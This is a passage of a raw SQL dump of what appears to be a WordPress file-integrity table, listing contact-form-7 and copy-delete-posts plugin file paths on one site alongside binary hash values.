','jlT~]u=W8!F%C:S:','',0,'?'),('=5^L\n-[','wp-content/plugins/contact-form-7/includes/form-tags-manager.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/form-tags-manager.php',0,'&^ڳm\0$C8','&^ڳm\0$C8','iuN R`FTCSy L}Xȉ','',0,'?'),('pI:Svu','wp-content/plugins/contact-form-7/includes/formatting.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/formatting.php',0,'z$=nA笯;\Z9o','',0,'?'),('R9@@ Oq ','wp-content/plugins/contact-form-7/includes/html-formatter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/html-formatter.php',0,'!%,+','!%,+','q+*JoEZ5Fޅ#b$)b','',0,'?'),(':ӱ`JiL','wp-content/plugins/contact-form-7/includes/integration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/integration.php',0,'Ԋt\Z&e̠np','Ԋt\Z&e̠np','Y=U;2\0u(y݁r','',0,'?'),('`SO٪U&*w','wp-content/plugins/contact-form-7/includes/js/html5-fallback.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/js/html5-fallback.js',0,'*=On]gz','*=On]gz',':n1Z5>d?!vW-9*|','',0,'?'),('Xo~_k','wp-content/plugins/contact-form-7/includes/mail.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/mail.php',0,'7YQœ,(VȂ','7YQœ,(VȂ',' rԬBV=lu-Doj','',0,'?'),('4:j;F?.','wp-content/plugins/contact-form-7/includes/pipe.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/pipe.php',0,'crh뗈D','crh뗈D','\\4MrV',';TZyY>4MrV','\nU|q/RÿVq4jB-܏h~)','',0,'?'),('2VJ܌','wp-content/plugins/contact-form-7/includes/special-mail-tags.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/special-mail-tags.php',0,'BU`<ž:ji','BU`<ž:ji','<膖3uSՇy}Pӯ)nm;\"','',0,'?'),('?cKl}g5ᴐ','wp-content/plugins/contact-form-7/includes/submission.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/submission.php',0,'xm5E-~2P','˜^\n*T>~2P','YpwKX\\XWî`VǕA','',0,'?'),('^dF5z\'%','wp-content/plugins/contact-form-7/includes/swv/rules/email.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/email.php',0,'|M7\'','|M7\'','SȻB76|4`SNf','',0,'?'),('~e[ AO','wp-content/plugins/contact-form-7/includes/swv/rules/enum.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/enum.php',0,'N>M.rP\'','N>M.rP\'','%7--1%K; \"$ܚ\r','',0,'?'),('nQ v?H|','wp-content/plugins/contact-form-7/includes/swv/rules/file.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/file.php',0,'?^.','?^.','\"3-X$@f=v앳l','',0,'?'),('kĴrpKuw\r ','wp-content/plugins/contact-form-7/includes/swv/rules/maxdate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/maxdate.php',0,'[!y9PISQ偊j','[!y9PISQ偊j','+JWw)}a-. #K','',0,'?'),(' G-/|i','wp-content/plugins/contact-form-7/includes/swv/rules/maxfilesize.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/maxfilesize.php',0,'T.ZmQcE','T.ZmQcE','}y:(u;BF[H1`0P]a','',0,'?'),('wGy7\0Cd2\\K','wp-content/plugins/contact-form-7/includes/swv/rules/maxitems.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/maxitems.php',0,'mJc8 XZoqC ','mJc8 XZoqC ','vJ\0*Jd)\\tܟ:','',0,'?'),('ccqApw','wp-content/plugins/contact-form-7/includes/swv/rules/maxlength.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/maxlength.php',0,'p\ZX S qû|','p\ZX S qû|','BC@WX18cfEZ>=.','',0,'?'),('#Pkk 8ic','wp-content/plugins/contact-form-7/includes/swv/rules/maxnumber.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/maxnumber.php',0,'!G Vx8Da','!G Vx8Da','. 0nkY\rm6EOvŜ.}','',0,'?'),('2k>Q,(Ѣa D','wp-content/plugins/contact-form-7/includes/swv/rules/mindate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/mindate.php',0,'?:PUYpm%/','?:PUYpm%/','Uq@`]ݸ YUVD;pc^&','',0,'?'),('V+: Uu8q','wp-content/plugins/contact-form-7/includes/swv/rules/minfilesize.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/minfilesize.php',0,' #o<2FAs',' #o<2FAs','w=*>,\"ɘQyϺޟ+','',0,'?'),('p8عK KoH','wp-content/plugins/contact-form-7/includes/swv/rules/minitems.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/minitems.php',0,'HUtۛiI','HUtۛiI','lV(u@r𠷡1cj}L,ǩ','',0,'?'),('GGC,','wp-content/plugins/contact-form-7/includes/swv/rules/minlength.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/minlength.php',0,'D(^M~z)\\5x3','D(^M~z)\\5x3','}|P3{䐴>B\nό\"','',0,'?'),('LO\'4$','wp-content/plugins/contact-form-7/includes/swv/rules/minnumber.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/minnumber.php',0,'(܋k]_i','(܋k]_i','*1|bg % 5KUHJ','',0,'?'),('?ZBfkF','wp-content/plugins/contact-form-7/includes/swv/rules/number.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/number.php',0,'Μm#L.\Z[','Μm#L.\Z[','Ü.xNwHץ֕Ҟ\Zokƭ','',0,'?'),('j.)?/z','wp-content/plugins/contact-form-7/includes/swv/rules/required.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/required.php',0,'Q`\0;, _׊','Q`\0;, _׊','dG|qzW\ZVʺ0+b','',0,'?'),('aK01#Up7>','wp-content/plugins/contact-form-7/includes/swv/rules/requiredfile.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/requiredfile.php',0,'lx2M)Npm*','lx2M)Npm*','I^o&z@yfZ\'\0G`z9','',0,'?'),('r.\\ tG','wp-content/plugins/contact-form-7/includes/swv/rules/tel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/tel.php',0,'h٩WnTf','h٩WnTf','*d_͠P/Z9brLjky','',0,'?'),('V8\"_','wp-content/plugins/contact-form-7/includes/swv/rules/time.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/time.php',0,'SC*Ux\0ѵ/','SC*Ux\0ѵ/','RPݠ]2 :Fو|R ?dGUkQ','',0,'?'),('VScE$E','wp-content/plugins/contact-form-7/includes/swv/rules/url.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/rules/url.php',0,'`dKȡ~|Y~ʕ','`dKȡ~|Y~ʕ','/y:8z#tp`*#&;R@,','',0,'?'),('ahde.wlCh','wp-content/plugins/contact-form-7/includes/swv/schema-holder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/schema-holder.php',0,'ЧvVL99','ЧvVL99','%\nEOĝ)&]Cyu˴#{','',0,'?'),('1TO!_7-[L','wp-content/plugins/contact-form-7/includes/swv/script-loader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/script-loader.php',0,'e;\\Mu','e;\\Mu','QaV!]WJy84} ','',0,'?'),('*\nN`\rSs3^_z','wp-content/plugins/contact-form-7/includes/swv/swv.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/swv/swv.php',0,'qlѕQN<','qlѕQN<',']&eYsfF&)zh\" ','',0,'?'),('\0pWG\r}^\r̈́L','wp-content/plugins/contact-form-7/includes/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/upgrade.php',0,'X6\r[ֳ;W9','X6\r[ֳ;W9','؇޾ %\"C_','',0,'?'),('_t9@ _) J=_','wp-content/plugins/contact-form-7/includes/validation-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/validation-functions.php',0,'\"n|x\"h\r','\"n|x\"h\r','G؆)P^D#\rdDoN','',0,'?'),(' .gw','wp-content/plugins/contact-form-7/includes/validation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/includes/validation.php',0,'^kU[PӥqL','^kU[PӥqL','\"P|DFh1uh\r#','',0,'?'),('M^.h','wp-content/plugins/contact-form-7/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/load.php',0,'й72[','й72[','AJ:1Nior݆K','',0,'?'),('anFh #ۈ','wp-content/plugins/contact-form-7/modules/acceptance.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/acceptance.php',0,'g:JabķfqO}','g:JabķfqO}','Ru(\Zjadnӓ\n6\0G','',0,'?'),('o`|+ǿkHf','wp-content/plugins/contact-form-7/modules/akismet/akismet.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/akismet/akismet.php',0,'k]\Z1Fn','k]\Z1Fn','RN? /\'XwMKLMꠗ\Z!\\','',0,'?'),('9F6 G','wp-content/plugins/contact-form-7/modules/akismet/service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/akismet/service.php',0,'$EpqUh˽<','$EpqUh˽<','^`Ks|JMِ(VNvO)I','',0,'?'),('\rvkP-tGHm','wp-content/plugins/contact-form-7/modules/checkbox.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/checkbox.php',0,'tzMu,M','tzMu,M','J?.u!Ob}܏éE\\&','',0,'?'),('/@\0K5V\nq','wp-content/plugins/contact-form-7/modules/constant-contact/constant-contact.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/constant-contact/constant-contact.php',0,'/xYrdi','/xYrdi','KUB\'| >wUG۳\n܎ _','',0,'?'),('\\vDE|,xͱ','wp-content/plugins/contact-form-7/modules/constant-contact/contact-form-properties.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/constant-contact/contact-form-properties.php',0,'чf@qkN~','чf@qkN~','}g[y3)Z##\'2 Ɛ','',0,'?'),('~Ta2l;6늌','wp-content/plugins/contact-form-7/modules/constant-contact/contact-post-request.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/constant-contact/contact-post-request.php',0,'25i/+:\n+\"','25i/+:\n+\"','Mu\"¼2\nBJ\rmw\"?','',0,'?'),('>Bp/','wp-content/plugins/contact-form-7/modules/constant-contact/doi.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/constant-contact/doi.php',0,'T  vؼ','T  vؼ','1yh4¹\')xgnQŎWB1h!','',0,'?'),('t}}d//}e','wp-content/plugins/contact-form-7/modules/constant-contact/service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/constant-contact/service.php',0,'EZܝ ] [','EZܝ ] [','\r_ni\rO+,R,*P, 4','',0,'?'),('(,\0[734','wp-content/plugins/contact-form-7/modules/count.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/count.php',0,'4OEN0Ȃ)','4OEN0Ȃ)','+*PuP]OgSC!ۥ','',0,'?'),('\0@u2X','wp-content/plugins/contact-form-7/modules/date.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/date.php',0,'pFKOi`Q2','pFKOi`Q2','Gyj8yRdIf\ZS','',0,'?'),('=Ɓy柫','wp-content/plugins/contact-form-7/modules/disallowed-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/disallowed-list.php',0,'N\"4CN\'','N\"4CN\'','W޴DrA>1zﺶN2','',0,'?'),('NiQgzǢߚ4','wp-content/plugins/contact-form-7/modules/doi-helper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/doi-helper.php',0,'шT+AOklЪU','шT+AOklЪU','MX\'IU3M(y\'ė,eY)','',0,'?'),('YIETt2L]','wp-content/plugins/contact-form-7/modules/file.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/file.php',0,'VD1cYmUp','VD1cYmUp','#H:/Rve>ɋfI\n8C@','',0,'?'),('x>E\\Q;\\','wp-content/plugins/contact-form-7/modules/flamingo.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/flamingo.php',0,'s Wt?aZ[A#','s Wt?aZ[A#','h6efF8[?;jM{i\nE','',0,'?'),('!B\Zl!Z0','wp-content/plugins/contact-form-7/modules/hidden.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/hidden.php',0,'A8|)6ab \r','A8|)6ab \r','a9斷x➃ꗘ=m_','',0,'?'),('=fd\\ӂv','wp-content/plugins/contact-form-7/modules/listo.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/listo.php',0,'neow+ooKJ','neow+ooKJ','jM\"`\rU PAu73;f7','',0,'?'),('k <(Gw','wp-content/plugins/contact-form-7/modules/number.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/number.php',0,'W~Bgf','W~Bgf','\r(_g7Cv~(u3:&ȠELO','',0,'?'),('Ee\"^zT','wp-content/plugins/contact-form-7/modules/quiz.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/quiz.php',0,'!tO~~W\0a]gh','!tO~~W\0a]gh','Eg6t4n>L','wp-content/plugins/contact-form-7/modules/recaptcha/service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/recaptcha/service.php',0,'FaT2%','FaT2%','l0\0~sŦ~-&Xu\n','',0,'?'),('ۊe\r5<','wp-content/plugins/contact-form-7/modules/reflection.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/reflection.php',0,'17^k\n','17^k\n','bŗۘWz&2c ~$_VZfd','',0,'?'),('\\\n;:I\"@Oh','wp-content/plugins/contact-form-7/modules/response.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/response.php',0,'a٤@W+X*1','a٤@W+X*1','9H\n 6m`MvL ','',0,'?'),('ݺ$;kJ al1','wp-content/plugins/contact-form-7/modules/select.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/select.php',0,'6UN85$\']','6UN85$\']','Iߐ9l&6M1sl','',0,'?'),('~;s5WBmEV','wp-content/plugins/contact-form-7/modules/sendinblue/contact-form-properties.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/contact-form-properties.php',0,'cK\'?x?t|&2','cK\'?x?t|&2','WsߏaeV[\ra`H.p`','',0,'?'),('1N-MdD0','wp-content/plugins/contact-form-7/modules/sendinblue/doi.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/doi.php',0,'JV\raM\"K','JV\raM\"K','HgDM_hHو,iYj','',0,'?'),('$zQ y','wp-content/plugins/contact-form-7/modules/sendinblue/sendinblue.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/sendinblue.php',0,'s2M\r!l㺏OX','s2M\r!l㺏OX',' ]24)K8I.IӀ','',0,'?'),('MTbv> L~','wp-content/plugins/contact-form-7/modules/sendinblue/service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/service.php',0,'40uKo`ޣ','40uKo`ޣ','=wg5fykbt*c0nZ.','',0,'?'),('ހ[11bBc !','wp-content/plugins/contact-form-7/modules/stripe/api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/api.php',0,'Pm\"9}','Pm\"9}','~t*a!݅)V\\];y','',0,'?'),('e;\Zzv@','wp-content/plugins/contact-form-7/modules/stripe/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/index.asset.php',0,'q7Q%k!q','q7Q%k!q','i(X0nqsjDMXs bvn','',0,'?'),('Uh5(\Z','wp-content/plugins/contact-form-7/modules/stripe/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/index.js',0,'-{8<&!x#\'','-{8<&!x#\'','ҷ;2=kӈ=?\0i81qEبz9q','',0,'?'),('ԉSַ3*\0ha','wp-content/plugins/contact-form-7/modules/stripe/service.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/service.php',0,'?d-a)`w','?d-a)`w','ScV}%m64-\" 4U)','',0,'?'),('zMj`巂*','wp-content/plugins/contact-form-7/modules/stripe/stripe.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/stripe.php',0,'gPԉ\".| 6','gPԉ\".| 6','P[}b3HSH!jVs/5t','',0,'?'),('J?4Yh e!>O','wp-content/plugins/contact-form-7/modules/submit.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/submit.php',0,'u߮sFWK','u߮sFWK','rɰKErm<*=/n!\\}=%','',0,'?'),('bN=,S','wp-content/plugins/contact-form-7/modules/text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/text.php',0,'(\"wѾ @?1','(\"wѾ @?1','Z涮.yiݴ`:4eQ7d','',0,'?'),('r\"-\0EwX','wp-content/plugins/contact-form-7/modules/textarea.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/textarea.php',0,'z˛1 J','z˛1 J','7쬁>Zz]q6v5:','',0,'?'),('\r¶2O2&@','wp-content/plugins/contact-form-7/uninstall.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/uninstall.php',0,'x2v0\r','x2v0\r',']C`\'ŦQ5&f','',0,'?'),('kN(lZfE\"Lm','wp-content/plugins/contact-form-7/wp-contact-form-7.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php',0,'A^1O:`','A^1O:`','%i&m̄ p1ɟVis.','',0,'?'),('^AXÄ','wp-content/plugins/copy-delete-posts/analyst/assets/css/customize.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/css/customize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS/T$','B=.zIF.ʂpyaeOu\nc ','',0,'?'),('Kc-Q;1','wp-content/plugins/copy-delete-posts/analyst/assets/img/pencil.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/pencil.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\Z~\\*Ŏ','~\'cLGUf<5-m','',0,'?'),('!ڹ`q:evܼ','wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_question.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_question.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b CNz5]\0','9#*:D-|X4b-F\n!','',0,'?'),('0Y}>','wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_success.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E͑Ol','>+q:֕]k=r b~Ϫq+','',0,'?'),('ncõ ؇?L','wp-content/plugins/copy-delete-posts/analyst/assets/img/smile.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǽ9\\ʥyaM',')KV','k~ UH\ZxPĀ<;X','',0,'?'),('0%\\\Z7uQ','wp-content/plugins/copy-delete-posts/analyst/assets/js/customize.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ʷF&)zܭ','~lp7^8q7M4?,tlekZׂ','',0,'?'),('eN8B`t ','wp-content/plugins/copy-delete-posts/analyst/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(m\rZ\Z>]m','wUD-\r?aӭ\"}8','',0,'?'),('lDM\"l~I','wp-content/plugins/copy-delete-posts/analyst/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+MjL\'',' ~UJQN P7˵d','',0,'?'),('v(C5X̩:>I','wp-content/plugins/copy-delete-posts/analyst/main.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x5uR','EJI[DrMX \'(x(ƽeL','',0,'?'),('!=;4ɉ7yȰ[','wp-content/plugins/copy-delete-posts/analyst/sdk_resolver.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/sdk_resolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#tF6yb','@Wr\Z+edRW\\h-+;U7','',0,'?'),('\0cQĈ= p[ ','wp-content/plugins/copy-delete-posts/analyst/src/Account/Account.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Account/Account.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v&3UBȑ','-9n砺K S_t:\0;@$','',0,'?'),('o\r u2ᆯp0t','wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountData.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountData.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F/\0Ǘm','Eu80mb!Vd\Z?* O[Q]R','',0,'?'),('a45p(j^Wcl9','wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountDataFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountDataFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}$vM','|ol_S i>)DEnݐ','',0,'?'),('Sc\rٖu','wp-content/plugins/copy-delete-posts/analyst/src/Analyst.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Analyst.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$YͶp~KhWa','j\nXo @8*RPf]ĩUS*','',0,'?'),('Pـm˸Y','wp-content/plugins/copy-delete-posts/analyst/src/ApiRequestor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/ApiRequestor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rc/z\Z','n\ZMOjw!l8ȥ#aq','',0,'?'),('z\Zy&BzC','wp-content/plugins/copy-delete-posts/analyst/src/ApiResponse.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/ApiResponse.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K|fK\":','_SaœnnKrɿk^:H4','',0,'?'),('N \0pC','wp-content/plugins/copy-delete-posts/analyst/src/Cache/DatabaseCache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Cache/DatabaseCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 1q/:E','[2Co\0!1WV','',0,'?'),('OExk\' /u','wp-content/plugins/copy-delete-posts/analyst/src/Collector.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Collector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D[gg',',]{sm|mS3ڕHsN7','',0,'?'),('Dp?@Q1=o','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/HttpClientContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/HttpClientContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#꽢8H9Sf ','0{\' ԅv(=c=gJÎ','',0,'?'),('Io2> ǵ','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ˀ.','A{?jOB~o,yrBS{t','',0,'?'),('X pW\"Bٝ','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestorContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestorContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"2\'M+X','e7w޻iź_)6Mp\0:r[','',0,'?'),('yqVдIAR:q=K','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/TrackerContract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/TrackerContract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƾHu!-[','^P.d¼>F9w^BH}X','',0,'?'),('q6eb&','wp-content/plugins/copy-delete-posts/analyst/src/Core/AbstractFactory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Core/AbstractFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vDPKBT','خR_V_vɝy\\ՅE\Z(','',0,'?'),('qSZ0X,.4','wp-content/plugins/copy-delete-posts/analyst/src/Http/CurlHttpClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/CurlHttpClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mr4lcEY:`',',k/i]ݕ{t\njt','',0,'?'),('O Q~Zȯ3','wp-content/plugins/copy-delete-posts/analyst/src/Http/DummyHttpClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/DummyHttpClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7u[/L\0ԣ','*A+}BqFS@_]@MV','',0,'?'),('%zgxOmiISd','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/AbstractLoggerRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/AbstractLoggerRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5=i%DWwz','xy+֥k0Psdy','',0,'?'),(' QspgUq','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/ActivateRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/ActivateRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%gG_kO9*GS','Mny;yx5)\'\\&\0fȄ','',0,'?'),('.--PV','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/DeactivateRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/DeactivateRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l7}x','N\r@Q|/{먲,\\x','',0,'?'),('K\ZVc&ĭ€','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/InstallRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/InstallRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r@D|4ŧSg','.h1 9v F=hU#','',0,'?'),('-(`kq$','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptInRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptInRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}s:ފOuT','zSUj\\\"\Z4 }Cc.3f ','',0,'?'),('$ZYz|T\\]X]','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptOutRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptOutRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\nb&','=H/͞C\Z`M`s܇s7K\0','',0,'?'),('s&@ajH^f+','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/UninstallRequest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/UninstallRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G]','A\Z\"*\r7<\"oO','',0,'?'),('ɋJ9BIo(C','wp-content/plugins/copy-delete-posts/analyst/src/Http/WordPressHttpClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/WordPressHttpClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0